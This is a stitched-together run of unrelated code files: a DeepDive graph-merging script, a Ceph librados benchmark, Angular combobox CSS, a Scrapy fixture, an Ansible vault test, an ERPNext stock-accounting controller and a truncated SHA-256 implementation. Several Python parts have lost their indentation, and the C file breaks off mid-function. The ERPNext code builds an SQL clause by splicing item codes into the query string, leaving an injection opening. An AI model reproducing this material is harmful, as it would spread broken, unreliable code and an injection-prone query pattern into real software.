os.system("awk '{{ sum += $1 }} END {{ printf \"%.0f\\n\", sum }}' {0}/dd_nedges_ > {0}/dd_nedges".format(INPUTFOLDER))
# concatenate files
print "CONCATENATING FILES..."
os.system("cat {0}/dd_nweights {0}/dd_nvariables {0}/dd_nfactors {0}/dd_nedges | tr '\n' ',' > {0}/graph.meta".format(INPUTFOLDER))
os.system("echo {0}/graph.weights,{0}/graph.variables,{0}/graph.factors,{0}/graph.edges >> {1}/graph.meta".format(OUTPUTFOLDER, INPUTFOLDER))
if INPUTFOLDER != OUTPUTFOLDER:
os.system("mv {0}/graph.meta {1}/graph.meta".format(INPUTFOLDER, OUTPUTFOLDER))
os.system("mv {0}/dd_weights.bin {1}/graph.weights".format(INPUTFOLDER, OUTPUTFOLDER))
os.system("cat {0}/dd_variables/* > {1}/graph.variables".format(INPUTFOLDER, OUTPUTFOLDER))
os.system("cat {0}/dd_factors/dd_factors*factors.bin > {1}/graph.factors".format(INPUTFOLDER, OUTPUTFOLDER))
os.system("cat {0}/dd_factors/dd_factors*edges.bin > {1}/graph.edges".format(INPUTFOLDER, OUTPUTFOLDER))
# clean up folder
print "Cleaning up files"
os.system('rm -rf {0}/dd_*'.format(INPUTFOLDER)) | unknown | codeparrot/codeparrot-clean | ||
#!/usr/bin/python
# import necessary library.
import threading
import sys
import rados
import socket
import time
import os
import getopt
# Thread wrapper: each instance runs one independent performance test.
class multithread (threading.Thread):
    def __init__(self, threadID, name, size, number):
        """Remember the test parameters for this worker thread.

        threadID -- numeric id of the thread
        name     -- thread name, also used to derive object/file names
        size     -- size in bytes of the object to write/read
        number   -- total number of threads in this run
        """
        threading.Thread.__init__(self)
        self.threadID = threadID
        self.name = name
        self.size = size
        self.number = number

    def run(self):
        # Delegate the actual remove/write/read cycle to the module-level
        # helper, passing this thread's parameters.
        performancetest(self.name, self.size, self.number)
# create a function to do the performance test.
def performancetest(threadName, objectsize, threadnumber):
    """Run one remove/write/read cycle against the ceph 'rbd' pool.

    threadName   -- name of the calling thread; used to build a unique
                    object name and local file names
    objectsize   -- number of bytes to write to (and read from) the object
    threadnumber -- total thread count (currently unused in the body)

    The timing variables (dbegintime/wendtime/...) are captured around each
    phase; the print statements that would report them are commented out.
    """
    # add host name to each thread so object names are unique per host+thread.
    hostname = socket.gethostname()
    objectname = hostname + threadName
    # create an empty data.
    data = ''
    # create two local file, one for write test and the other for read test.
    localreadfilename = "/tmp/localreadfileobj" + threadName
    localwritefilename = "/tmp/localwritefileobj" + threadName
    # delete local read files if exists.
    # NOTE(review): os.remove raises OSError on failure, not TypeError — these
    # handlers presumably never fire; confirm before relying on them.
    try:
        if os.path.isfile(localreadfilename):
            os.remove(localreadfilename)
    except TypeError as e:
        print hostname, ' - ', threadName, ' - ', e
    # delete local write files if exists.
    try:
        if os.path.isfile(localwritefilename):
            os.remove(localwritefilename)
    except TypeError as e:
        print hostname, ' - ', threadName, ' - ', e
    # open the local file to fill some random data.
    #openfile = open(localwritefilename,"w")
    #openfile.write("1001101011")
    #openfile.close()
    # using librados to create a cluster handle (conffile='' reads the
    # default ceph configuration).
    try:
        cluster = rados.Rados(conffile='')
    # exit program if any error.
    except TypeError as e:
        #print hostname, ' - ', threadName, ' - Argument validation error: ', e
        raise e
    #print hostname, ' - ', threadName, " - Created cluster handle."
    # using librados to connect to ceph.
    try:
        cluster.connect()
    # exit program if any error.
    except Exception as e:
        #print hostname, ' - ', threadName, " - connection error: ", e
        raise e
    # if no errors, print the info that cluster has been connected.
    #finally:
        #print hostname, ' - ', threadName, " - Connected to the cluster."
    #print hostname, ' - ', threadName, " - Creating a context for the pool 'rbd'."
    # search the pool by given name.
    # exit if no such pool.
    if not cluster.pool_exists('rbd'):
        raise RuntimeError('No rbd pool exists')
    # if the pool exsits, open it for later use.
    ioctx = cluster.open_ioctx('rbd')
    ###################################
    # remove an object from ceph.
    # 1. remove an object from ceph cluster.
    ###################################
    #print hostname, ' - ', threadName, " - Removing objectfrom pool 'rbd'."
    # mark begin time
    dbegintime = time.time()
    # remove the object by object name; a missing object is not an error for
    # this benchmark, so the failure is only reported.
    try:
        ioctx.remove_object(objectname)
    except:
        print hostname, ' - ', threadName, ' - No such object, continue'
    # mark end time
    dendtime = time.time()
    ioctx.close()
    ###################################
    # write an object into ceph.
    # 1. read some data from a local file.
    # 2. save the string.
    # 3. write the data to ceph cluster.
    ###################################
    #print hostname, ' - ', threadName, " - Writing object with contents to pool 'rbd'."
    # open the file to read
    #openfile = open(localwritefilename,"r")
    # read the file into variable data.
    #data = openfile.read();
    # close the file.
    #openfile.close()
    # mark begin time.
    wbegintime = time.time()
    # search the pool by given name.
    # exit if no such pool.
    if not cluster.pool_exists('rbd'):
        raise RuntimeError('No rbd pool exists')
    # if the pool exsits, open it for later use.
    ioctx = cluster.open_ioctx('rbd')
    # build a payload of objectsize bytes (10-byte pattern repeated) and
    # write it into object storage by object name.
    for i in range(0,objectsize / 10):
        data = data + '1001011010'
    ioctx.write(objectname, data)
    # mark end time.
    wendtime = time.time()
    # save the size the ceph wrote.
    #wsize = os.path.getsize(localwritefilename)
    ioctx.close()
    # clean the cache so the read below is not served from the page cache.
    with open('/proc/sys/vm/drop_caches', 'w') as stream:
        stream.write('1\n')
    ###################################
    # read an object from ceph.
    # 1. read some data from ceph cluster.
    # 2. save the string.
    # 3. write the data to a local file.
    ###################################
    #print hostname, ' - ', threadName, " - Reading object with contents from pool 'rbd'."
    # mark begin time
    rbegintime = time.time()
    # search the pool by given name.
    # exit if no such pool.
    if not cluster.pool_exists('rbd'):
        raise RuntimeError('No rbd pool exists')
    # if the pool exsits, open it for later use.
    ioctx = cluster.open_ioctx('rbd')
    # read data from ceph by object name and size.
    # then save the string into variable data.
    data = ioctx.read(objectname,objectsize)
    # mark end time
    rendtime = time.time()
    ioctx.close()
    # open the local file to write.
    openfile = open(localreadfilename,"a")
    # write data into local file.
    openfile.write(data)
    # close the open file.
    openfile.close()
    # save the size the ceph read.
    rsize = os.path.getsize(localreadfilename)
    # close the connection to ceph cluster.
    #print hostname, ' - ', threadName, " - Closing the connection."
    #ioctx.close()
    # shutdown the cluster handle.
    #print hostname, ' - ', threadName, " - Shutting down the handle."
    cluster.shutdown()
    # print the object size that read from and wrote to ceph.
    #print hostname, ' - ', threadName, " - Size(Write): %f ." %wsize
    #print hostname, ' - ', threadName, " - Size(Read): %f ." %rsize
    # print the period for each operations.
    #print hostname, ' - ', threadName, " - Seconds(Write): %f ." %(wendtime - wbegintime)
    #print hostname, ' - ', threadName, " - Seconds(Read): %f ." %(rendtime - rbegintime)
    #print hostname, ' - ', threadName, " - Seconds(Remove): %f ." %(dendtime - dbegintime)
    #print hostname, ' - ', threadName, " - Total Seconds: %f ." %((wendtime - wbegintime) + (rendtime - rbegintime) + (dendtime - dbegintime))
    # clean the cache
    with open('/proc/sys/vm/drop_caches', 'w') as stream:
        stream.write('1\n')
# main function
def main(argv):
    """Parse -t/--threadnumber and -s/--objectsize and launch the workers.

    Limits: at most 1000 threads and 1 MB objects (the test server is small).
    Exits with status 2 on bad arguments or out-of-range values.
    """
    # get thread number and object size form parameters
    threadnumber = 0
    objectsize = 0
    # get thread number and object size form parameters
    try:
        opts, args = getopt.getopt(argv,"ht:s:",["threadnumber=","objectsize="])
    except getopt.GetoptError:
        # if the parameter format is wrong, print the help
        print 'c-obj.py -t <threadnumber> -s <objectsize>'
        sys.exit(2)
    for opt, arg in opts:
        if opt == '-h':
            print 'c-obj.py -t <threadnumber> -s <objectsize(byte)>'
            print 'Please limit the thread number under 1000 and object size under 1MB'
            print 'since the test server is t2.small (low performance)'
            sys.exit()
        elif opt in ("-t", "--threadnumber"):
            if int(arg) > 1000:
                print 'Please limit the thread number under 1000 and object size under 1MB'
                print 'since the test server is t2.small (low performance)'
                sys.exit(2)
            threadnumber = int(arg)
        elif opt in ("-s", "--objectsize"):
            if int(arg) > 1000000:
                print 'Please limit the thread number under 1000 and object size under 1MB'
                print 'since the test server is t2.small (low performance)'
                sys.exit(2)
            objectsize = int(arg)
    # multi threading: start one worker per requested thread (threads are
    # not joined; the process exits when all of them finish).
    for i in range(0,threadnumber):
        thr = multithread(i, "Thread-%d" %i, objectsize, threadnumber)
        thr.start()

# program entry
if __name__ == "__main__":
    main(sys.argv[1:])
/* Material icon font used for the search / arrow / check glyphs below. */
@import url('https://fonts.googleapis.com/icon?family=Material+Symbols+Outlined');

/* Component host: centers the combobox and defines the shared theme tokens,
   with fallbacks for when the page-level custom properties are unset. */
:host {
  display: flex;
  justify-content: center;
  font-family: var(--inter-font, system-ui, sans-serif);
  --border-color: color-mix(in srgb, var(--full-contrast, #000) 20%, var(--page-background, #fff));
  --primary: var(--vivid-pink, #f542a4);
}
/* Combobox container: column layout so the listbox stacks under the input. */
[ngCombobox] {
  position: relative;
  width: 100%;
  display: flex;
  flex-direction: column;
  border: 1px solid var(--border-color);
  border-radius: 1rem;
}

/* Select-style (readonly) comboboxes get a fixed width. */
[ngCombobox]:has([readonly='true']) {
  width: 15rem;
}

.combobox-input-container {
  display: flex;
  position: relative;
  align-items: center;
  border-radius: 1rem;
}

[ngComboboxInput] {
  border-radius: 1rem;
}

/* Readonly input behaves like a button: pointer cursor, no icon inset. */
[ngComboboxInput][readonly='true'] {
  cursor: pointer;
  padding: 0.7rem 1rem;
}

/* Focus styling is handled elsewhere; suppress the default ring here. */
[ngCombobox]:focus-within [ngComboboxInput] {
  outline: none;
  box-shadow: none;
}

/* Shared sizing for the material-symbol glyphs. */
.icon {
  width: 24px;
  height: 24px;
  font-size: 20px;
  display: grid;
  place-items: center;
  pointer-events: none;
}

.search-icon {
  padding: 0 0.5rem;
  position: absolute;
  opacity: 0.8;
}

.arrow-icon {
  padding: 0 0.5rem;
  position: absolute;
  right: 0;
  opacity: 0.8;
  transition: transform 0.2s ease;
}

/* Flip the arrow while the popup is open. */
[ngComboboxInput][aria-expanded='true'] + .arrow-icon {
  transform: rotate(180deg);
}

/* Text input itself; left padding leaves room for the search icon. */
[ngComboboxInput] {
  width: 100%;
  border: none;
  outline: none;
  font-size: 1rem;
  padding: 0.7rem 1rem 0.7rem 2.5rem;
  background-color: var(--septenary-contrast, #f5f5f5);
  color: var(--primary-contrast, #1a1a1a);
}
/* Scrollable option list below the input. */
[ngListbox] {
  gap: 2px;
  max-height: 10rem;
  display: flex;
  overflow: auto;
  flex-direction: column;
}

[ngOption] {
  display: flex;
  cursor: pointer;
  align-items: center;
  margin: 1px;
  padding: 1rem;
  min-height: 1rem;
  border-radius: 1rem;
}

/* Hover and keyboard-active options share the same subtle background. */
[ngOption]:hover,
[ngOption][data-active='true'] {
  background-color: color-mix(in srgb, var(--primary-contrast, #1a1a1a) 5%, transparent);
}

/* Keyboard-active option additionally gets a focus ring. */
[ngOption][data-active='true'] {
  outline-offset: -2px;
  outline: 2px solid var(--primary);
}

/* Selected option is tinted with the primary color. */
[ngOption][aria-selected='true'] {
  color: var(--primary);
  background-color: color-mix(in srgb, var(--primary) 10%, transparent);
}

/* Checkmark is only shown next to the selected option. */
[ngOption]:not([aria-selected='true']) .check-icon {
  display: none;
}

.option-label {
  flex: 1;
}

.check-icon {
  font-size: 0.9rem;
}
/* Popup dialog that hosts the combobox. Positioned by script, hence the
   `auto` insets. */
.dialog {
  /* Fix: `padding: none` is not a valid padding value, so the declaration
     was dropped by the parser and the UA's default dialog padding applied;
     `0` expresses the intended zero padding. */
  padding: 0;
  position: absolute;
  left: auto;
  right: auto;
  top: auto;
  bottom: auto;
  border: 1px solid var(--border-color);
  border-radius: 1rem;
  background-color: var(--septenary-contrast, #f5f5f5);
  color: inherit;
}
/* Inside the dialog the container borders/rounding are handled by the
   dialog itself, so the inner pieces drop theirs. */
.dialog .combobox-input-container {
  border-radius: 0;
}

.dialog [ngCombobox],
.dialog .combobox-input-container {
  border: none;
}

/* Input sits flush against the listbox below it. */
.dialog [ngComboboxInput] {
  border-bottom-left-radius: 0;
  border-bottom-right-radius: 0;
}

/* Focus ring for non-dialog inputs. */
[ngCombobox]:focus-within [ngComboboxInput]:not(.combobox-input) {
  outline: 1.5px solid var(--vivid-pink);
  box-shadow: 0 0 0 4px color-mix(in srgb, var(--vivid-pink) 25%, transparent);
}

/* The dialog supplies its own visuals; hide the native backdrop. */
.dialog::backdrop {
  opacity: 0;
}

/* Empty-state message shown when filtering yields no options. */
.no-results {
  padding: 1rem;
}
import scrapy
from scrapy.crawler import CrawlerProcess
class AsyncioReactorSpider1(scrapy.Spider):
    # Fixture spider requesting the asyncio reactor via per-spider settings.
    name = "asyncio_reactor1"
    custom_settings = {
        "TWISTED_REACTOR": "twisted.internet.asyncioreactor.AsyncioSelectorReactor",
    }


class AsyncioReactorSpider2(scrapy.Spider):
    # Second spider with the same reactor setting; running both in one
    # CrawlerProcess exercises identical custom reactor settings coexisting.
    name = "asyncio_reactor2"
    custom_settings = {
        "TWISTED_REACTOR": "twisted.internet.asyncioreactor.AsyncioSelectorReactor",
    }


# Schedule both spiders in a single process; start() blocks until both finish.
process = CrawlerProcess()
process.crawl(AsyncioReactorSpider1)
process.crawl(AsyncioReactorSpider2)
process.start()
# Verify the vaulted variable was decrypted to the expected plaintext.
- assert:
    that:
      - 'secret_var == "secret"'

# Copy a vault-encrypted file; the copy module writes it out decrypted.
- copy: src=vault-secret.txt dest={{output_dir}}/secret.txt

# Remove the decrypted copy so it does not leak between test runs.
- name: cleanup decrypted file
  file: path={{ output_dir }}/secret.txt state=absent
# Copyright (c) 2013, Web Notes Technologies Pvt. Ltd. and Contributors
# License: GNU General Public License v3. See license.txt
from __future__ import unicode_literals
import webnotes
from webnotes.utils import cint, flt, cstr
from webnotes import msgprint, _
import webnotes.defaults
from controllers.accounts_controller import AccountsController
from accounts.general_ledger import make_gl_entries, delete_gl_entries
class StockController(AccountsController):
def make_gl_entries(self, update_gl_entries_after=True):
if self.doc.docstatus == 2:
delete_gl_entries(voucher_type=self.doc.doctype, voucher_no=self.doc.name)
if cint(webnotes.defaults.get_global_default("auto_accounting_for_stock")):
warehouse_account = self.get_warehouse_account()
if self.doc.docstatus==1:
gl_entries = self.get_gl_entries(warehouse_account)
make_gl_entries(gl_entries)
if update_gl_entries_after:
self.update_gl_entries_after(warehouse_account)
	def get_gl_entries(self, warehouse_account=None, default_expense_account=None,
		default_cost_center=None):
		"""Build the GL entry dicts for this voucher's stock value changes.

		For every stock ledger entry of the voucher, a debit is posted to the
		warehouse account and a matching credit to the row's expense account
		(or vice versa for negative stock_value_difference). Warehouses with
		no linked account are collected and reported once via msgprint.
		"""
		from accounts.general_ledger import process_gl_map
		if not warehouse_account:
			warehouse_account = self.get_warehouse_account()

		# SLE rows grouped by voucher detail row name
		stock_ledger = self.get_stock_ledger_details()
		voucher_details = self.get_voucher_details(stock_ledger, default_expense_account,
			default_cost_center)

		gl_list = []
		warehouse_with_no_account = []
		for detail in voucher_details:
			sle_list = stock_ledger.get(detail.name)
			if sle_list:
				for sle in sle_list:
					if warehouse_account.get(sle.warehouse):
						# from warehouse account
						gl_list.append(self.get_gl_dict({
							"account": warehouse_account[sle.warehouse],
							"against": detail.expense_account,
							"cost_center": detail.cost_center,
							"remarks": self.doc.remarks or "Accounting Entry for Stock",
							"debit": flt(sle.stock_value_difference, 2)
						}))

						# to target warehouse / expense account
						gl_list.append(self.get_gl_dict({
							"account": detail.expense_account,
							"against": warehouse_account[sle.warehouse],
							"cost_center": detail.cost_center,
							"remarks": self.doc.remarks or "Accounting Entry for Stock",
							"credit": flt(sle.stock_value_difference, 2)
						}))
					elif sle.warehouse not in warehouse_with_no_account:
						warehouse_with_no_account.append(sle.warehouse)

		if warehouse_with_no_account:
			msgprint(_("No accounting entries for following warehouses") + ": \n" +
				"\n".join(warehouse_with_no_account))

		return process_gl_map(gl_list)
	def get_voucher_details(self, stock_ledger, default_expense_account, default_cost_center):
		"""Return the voucher rows that GL entries should be built from.

		Without a default expense account, the voucher's own item rows (under
		self.fname) are used and each row's expense account is validated.
		With a default, one synthetic row per stock-ledger detail key is
		built carrying the default expense account and cost center.
		"""
		if not default_expense_account:
			details = self.doclist.get({"parentfield": self.fname})
			for d in details:
				self.check_expense_account(d)
		else:
			details = [webnotes._dict({
				"name":d,
				"expense_account": default_expense_account,
				"cost_center": default_cost_center
			}) for d in stock_ledger.keys()]

		return details
def get_stock_ledger_details(self):
    """Map voucher_detail_no -> list of this voucher's Stock Ledger Entry rows."""
    entries_by_row = {}
    query = """select warehouse, stock_value_difference, voucher_detail_no
        from `tabStock Ledger Entry` where voucher_type=%s and voucher_no=%s"""
    for entry in webnotes.conn.sql(query, (self.doc.doctype, self.doc.name), as_dict=True):
        entries_by_row.setdefault(entry.voucher_detail_no, []).append(entry)
    return entries_by_row
def get_warehouse_account(self):
    """Map warehouse name (master_name) -> its ledger Account name."""
    rows = webnotes.conn.sql("""select master_name, name from tabAccount
        where account_type = 'Warehouse' and ifnull(master_name, '') != ''""")
    return dict(rows)
def update_gl_entries_after(self, warehouse_account=None):
    """Reconcile GL entries of stock vouchers posted after this one.

    For each later voucher, recompute its expected GL entries and
    compare (account, against_account, cost_center, debit, credit)
    against what is currently booked; on any mismatch delete the old
    entries and regenerate them (with update_gl_entries_after=False so
    the regeneration does not recurse back into this method).
    """
    future_stock_vouchers = self.get_future_stock_vouchers()
    gle = self.get_voucherwise_gl_entries(future_stock_vouchers)
    if not warehouse_account:
        warehouse_account = self.get_warehouse_account()

    for voucher_type, voucher_no in future_stock_vouchers:
        existing_gle = gle.get((voucher_type, voucher_no), [])
        voucher_obj = webnotes.get_obj(voucher_type, voucher_no)
        expected_gle = voucher_obj.get_gl_entries(warehouse_account)
        if expected_gle:
            matched = True
            if existing_gle:
                # Compare expected vs. booked amounts for rows with the
                # same (account, against, cost center) combination.
                for entry in expected_gle:
                    for e in existing_gle:
                        if entry.account == e.account \
                                and entry.against_account == e.against_account \
                                and entry.cost_center == e.cost_center:
                            if entry.debit != e.debit or entry.credit != e.credit:
                                matched = False
                                break
            else:
                # Nothing booked yet for this voucher: force a rewrite.
                matched = False

            if not matched:
                self.delete_gl_entries(voucher_type, voucher_no)
                voucher_obj.make_gl_entries(update_gl_entries_after=False)
        else:
            # No GL impact expected any more: drop any stale entries.
            self.delete_gl_entries(voucher_type, voucher_no)
def get_future_stock_vouchers(self):
    """List [voucher_type, voucher_no] of stock vouchers posted at or
    after this document's posting datetime, in posting order.

    When the controller knows its item child table (self.fname), the
    scan is narrowed to vouchers touching the same item codes.
    """
    future_stock_vouchers = []

    if hasattr(self, "fname"):
        # NOTE(review): item codes are spliced into the SQL string by
        # hand; a code containing a quote would break (or inject into)
        # the query. A parameterized "in (%s, ...)" clause like the one
        # in get_voucherwise_gl_entries would be safer -- confirm.
        item_list = [d.item_code for d in self.doclist.get({"parentfield": self.fname})]
        condition = ''.join(['and item_code in (\'', '\', \''.join(item_list), '\')'])
    else:
        condition = ""

    for d in webnotes.conn.sql("""select distinct sle.voucher_type, sle.voucher_no
        from `tabStock Ledger Entry` sle
        where timestamp(sle.posting_date, sle.posting_time) >= timestamp(%s, %s) %s
        order by timestamp(sle.posting_date, sle.posting_time) asc, name asc""" %
        ('%s', '%s', condition), (self.doc.posting_date, self.doc.posting_time),
        as_dict=True):
        future_stock_vouchers.append([d.voucher_type, d.voucher_no])

    return future_stock_vouchers
def get_voucherwise_gl_entries(self, future_stock_vouchers):
    """Group existing GL Entry rows by (voucher_type, voucher_no) for
    the given vouchers, looking only at entries on/after this posting date."""
    grouped = {}
    if not future_stock_vouchers:
        return grouped

    placeholders = ', '.join(['%s'] * len(future_stock_vouchers))
    query = """select * from `tabGL Entry`
        where posting_date >= %s and voucher_no in (%s)""" % ('%s', placeholders)
    params = tuple([self.doc.posting_date] + [v[1] for v in future_stock_vouchers])
    for row in webnotes.conn.sql(query, params, as_dict=1):
        grouped.setdefault((row.voucher_type, row.voucher_no), []).append(row)
    return grouped
def delete_gl_entries(self, voucher_type, voucher_no):
    """Hard-delete all GL Entry rows booked against the given voucher."""
    webnotes.conn.sql("""delete from `tabGL Entry`
        where voucher_type=%s and voucher_no=%s""", (voucher_type, voucher_no))
def make_adjustment_entry(self, expected_gle, voucher_obj):
    """Post balancing GL entries for any difference between stock value
    and the booked balance of the stock accounts.

    Per-account differences are computed as of expected_gle[0]'s
    posting date and booked against the company's stock adjustment
    account: debit the stock account, credit the adjustment account.
    """
    from accounts.utils import get_stock_and_account_difference
    account_list = [d.account for d in expected_gle]
    acc_diff = get_stock_and_account_difference(account_list, expected_gle[0].posting_date)

    cost_center = self.get_company_default("cost_center")
    stock_adjustment_account = self.get_company_default("stock_adjustment_account")

    gl_entries = []
    for account, diff in acc_diff.items():
        if diff:
            gl_entries.append([
                # stock in hand account
                voucher_obj.get_gl_dict({
                    "account": account,
                    "against": stock_adjustment_account,
                    "debit": diff,
                    "remarks": "Adjustment Accounting Entry for Stock",
                }),

                # account against stock in hand
                voucher_obj.get_gl_dict({
                    "account": stock_adjustment_account,
                    "against": account,
                    "credit": diff,
                    "cost_center": cost_center or None,
                    "remarks": "Adjustment Accounting Entry for Stock",
                }),
            ])

    if gl_entries:
        from accounts.general_ledger import make_gl_entries
        make_gl_entries(gl_entries)
def check_expense_account(self, item):
    """Validate that a child row carrying an "expense_account" field has
    both the expense/difference account and the cost center filled;
    msgprint(raise_exception=1) aborts on the first failure.
    """
    if item.fields.has_key("expense_account") and not item.expense_account:
        msgprint(_("""Expense/Difference account is mandatory for item: """) + item.item_code,
            raise_exception=1)

    # NOTE(review): the cost-center check is also gated on the presence
    # of "expense_account" (not "cost_center") -- presumably rows that
    # have an expense account always carry a cost center field; confirm.
    if item.fields.has_key("expense_account") and not item.cost_center:
        msgprint(_("""Cost Center is mandatory for item: """) + item.item_code,
            raise_exception=1)
def get_sl_entries(self, d, args):
    """Assemble the base Stock Ledger Entry dict for child row `d`,
    then overlay caller-specific values from `args`."""
    # Submitted vouchers (docstatus 1) add stock; otherwise reverse it.
    qty_sign = 1 if self.doc.docstatus == 1 else -1
    entry = {
        "item_code": d.item_code,
        "warehouse": d.warehouse,
        "posting_date": self.doc.posting_date,
        "posting_time": self.doc.posting_time,
        "voucher_type": self.doc.doctype,
        "voucher_no": self.doc.name,
        "voucher_detail_no": d.name,
        "actual_qty": qty_sign * flt(d.stock_qty),
        "stock_uom": d.stock_uom,
        "incoming_rate": 0,
        "company": self.doc.company,
        "fiscal_year": self.doc.fiscal_year,
        "batch_no": cstr(d.batch_no).strip(),
        "serial_no": d.serial_no,
        "project": d.project_name,
        "is_cancelled": "Yes" if self.doc.docstatus == 2 else "No"
    }
    entry.update(args)
    return entry
def make_sl_entries(self, sl_entries, is_amended=None):
    """Forward the prepared stock ledger dicts to the central
    stock.stock_ledger.make_sl_entries writer."""
    from stock.stock_ledger import make_sl_entries
    make_sl_entries(sl_entries, is_amended)
def get_stock_ledger_entries(self, item_list=None, warehouse_list=None):
    """Fetch this company's Stock Ledger Entries for the given items and
    warehouses, grouped by (item_code, warehouse) and ordered newest first."""
    result = {}
    if not (item_list and warehouse_list):
        item_list, warehouse_list = self.get_distinct_item_warehouse()

    if item_list and warehouse_list:
        item_placeholders = ', '.join(['%s'] * len(item_list))
        warehouse_placeholders = ', '.join(['%s'] * len(warehouse_list))
        query = """select item_code, voucher_type, voucher_no,
            voucher_detail_no, posting_date, posting_time, stock_value,
            warehouse, actual_qty as qty from `tabStock Ledger Entry`
            where company = %s and item_code in (%s) and warehouse in (%s)
            order by item_code desc, warehouse desc, posting_date desc,
            posting_time desc, name desc""" % \
            ('%s', item_placeholders, warehouse_placeholders)
        params = tuple([self.doc.company] + item_list + warehouse_list)
        for row in webnotes.conn.sql(query, params, as_dict=1):
            result.setdefault((row.item_code, row.warehouse), []).append(row)

    return result
def get_distinct_item_warehouse(self):
    """Collect the distinct item codes and warehouses referenced by the
    voucher's item rows plus its packing_details rows."""
    items = set()
    warehouses = set()
    rows = self.doclist.get({"parentfield": self.fname}) \
        + self.doclist.get({"parentfield": "packing_details"})
    for row in rows:
        items.add(row.item_code)
        warehouses.add(row.warehouse)
    return list(items), list(warehouses)
def make_cancel_gl_entries(self):
    """On cancellation: if any GL entries were booked for this voucher,
    delegate back to make_gl_entries to rewrite them."""
    if webnotes.conn.sql("""select name from `tabGL Entry` where voucher_type=%s
        and voucher_no=%s""", (self.doc.doctype, self.doc.name)):
        self.make_gl_entries()
/*********************************************************************
* Filename: sha256.c
* Author: Brad Conte (brad AT bradconte.com)
* Copyright:
* Disclaimer: This code is presented "as is" without any guarantees.
* Details: Implementation of the SHA-256 hashing algorithm.
SHA-256 is one of the three algorithms in the SHA2
specification. The others, SHA-384 and SHA-512, are not
offered in this implementation.
Algorithm specification can be found here:
* http://csrc.nist.gov/publications/fips/fips180-2/fips180-2withchangenotice.pdf
This implementation uses little endian byte order.
*********************************************************************/
/*************************** HEADER FILES ***************************/
#include <stdlib.h>
#include <string.h>
#include "sha256.h"
/****************************** MACROS ******************************/
/* 32-bit rotations. ROTLEFT is provided for completeness but is not
   used by the SHA-256 routines in this file. */
#define ROTLEFT(a,b) (((a) << (b)) | ((a) >> (32-(b))))
#define ROTRIGHT(a,b) (((a) >> (b)) | ((a) << (32-(b))))

/* FIPS 180 logical functions: choose, majority, and the big/small
   sigma functions used by the round function and message schedule. */
#define CH(x,y,z) (((x) & (y)) ^ (~(x) & (z)))
#define MAJ(x,y,z) (((x) & (y)) ^ ((x) & (z)) ^ ((y) & (z)))
#define EP0(x) (ROTRIGHT(x,2) ^ ROTRIGHT(x,13) ^ ROTRIGHT(x,22))
#define EP1(x) (ROTRIGHT(x,6) ^ ROTRIGHT(x,11) ^ ROTRIGHT(x,25))
#define SIG0(x) (ROTRIGHT(x,7) ^ ROTRIGHT(x,18) ^ ((x) >> 3))
#define SIG1(x) (ROTRIGHT(x,17) ^ ROTRIGHT(x,19) ^ ((x) >> 10))

/**************************** VARIABLES *****************************/
/* SHA-256 round constants k[0..63] (FIPS 180: first 32 bits of the
   fractional parts of the cube roots of the first 64 primes). */
static const WORD k[64] = {
	0x428a2f98,0x71374491,0xb5c0fbcf,0xe9b5dba5,0x3956c25b,0x59f111f1,0x923f82a4,0xab1c5ed5,
	0xd807aa98,0x12835b01,0x243185be,0x550c7dc3,0x72be5d74,0x80deb1fe,0x9bdc06a7,0xc19bf174,
	0xe49b69c1,0xefbe4786,0x0fc19dc6,0x240ca1cc,0x2de92c6f,0x4a7484aa,0x5cb0a9dc,0x76f988da,
	0x983e5152,0xa831c66d,0xb00327c8,0xbf597fc7,0xc6e00bf3,0xd5a79147,0x06ca6351,0x14292967,
	0x27b70a85,0x2e1b2138,0x4d2c6dfc,0x53380d13,0x650a7354,0x766a0abb,0x81c2c92e,0x92722c85,
	0xa2bfe8a1,0xa81a664b,0xc24b8b70,0xc76c51a3,0xd192e819,0xd6990624,0xf40e3585,0x106aa070,
	0x19a4c116,0x1e376c08,0x2748774c,0x34b0bcb5,0x391c0cb3,0x4ed8aa4a,0x5b9cca4f,0x682e6ff3,
	0x748f82ee,0x78a5636f,0x84c87814,0x8cc70208,0x90befffa,0xa4506ceb,0xbef9a3f7,0xc67178f2
};
/*********************** FUNCTION DEFINITIONS ***********************/
/* Compress one 64-byte block into the hash state (the FIPS 180 SHA-256
 * compression function). `data` must point to exactly 64 bytes. */
void sha256_transform(SHA256_CTX *ctx, const BYTE data[])
{
	WORD a, b, c, d, e, f, g, h, i, j, t1, t2, m[64];

	/* Load the block big-endian into the first 16 schedule words. */
	for (i = 0, j = 0; i < 16; ++i, j += 4) {
		m[i] = ((WORD) data[j + 0] << 24) |
		       ((WORD) data[j + 1] << 16) |
		       ((WORD) data[j + 2] << 8) |
		       ((WORD) data[j + 3]);
	}
	/* Expand to the remaining 48 message-schedule words. */
	for ( ; i < 64; ++i)
		m[i] = SIG1(m[i - 2]) + m[i - 7] + SIG0(m[i - 15]) + m[i - 16];

	/* Working variables start from the current chaining state. */
	a = ctx->state[0];
	b = ctx->state[1];
	c = ctx->state[2];
	d = ctx->state[3];
	e = ctx->state[4];
	f = ctx->state[5];
	g = ctx->state[6];
	h = ctx->state[7];

	/* 64 compression rounds. */
	for (i = 0; i < 64; ++i) {
		t1 = h + EP1(e) + CH(e,f,g) + k[i] + m[i];
		t2 = EP0(a) + MAJ(a,b,c);
		h = g;
		g = f;
		f = e;
		e = d + t1;
		d = c;
		c = b;
		b = a;
		a = t1 + t2;
	}

	/* Fold the round output back into the chaining state. */
	ctx->state[0] += a;
	ctx->state[1] += b;
	ctx->state[2] += c;
	ctx->state[3] += d;
	ctx->state[4] += e;
	ctx->state[5] += f;
	ctx->state[6] += g;
	ctx->state[7] += h;
}
/* Reset the context: clear the buffered byte and bit counters and load
 * the initial hash values H0..H7 from FIPS 180 (first 32 bits of the
 * fractional parts of the square roots of the first 8 primes). */
void sha256_init(SHA256_CTX *ctx)
{
	ctx->datalen = 0;
	ctx->bitlen = 0;
	ctx->state[0] = 0x6a09e667;
	ctx->state[1] = 0xbb67ae85;
	ctx->state[2] = 0x3c6ef372;
	ctx->state[3] = 0xa54ff53a;
	ctx->state[4] = 0x510e527f;
	ctx->state[5] = 0x9b05688c;
	ctx->state[6] = 0x1f83d9ab;
	ctx->state[7] = 0x5be0cd19;
}
/* Absorb `len` bytes of input, compressing each completed 64-byte
 * block. May be called repeatedly to hash a message in pieces.
 *
 * Fix: the loop index was declared as 32-bit WORD while `len` is
 * size_t; on 64-bit platforms any input of 4 GiB or more made
 * `i < len` never false (i wraps at 2^32), looping forever. Use
 * size_t for the index. */
void sha256_update(SHA256_CTX *ctx, const BYTE data[], size_t len)
{
	size_t i;

	for (i = 0; i < len; ++i) {
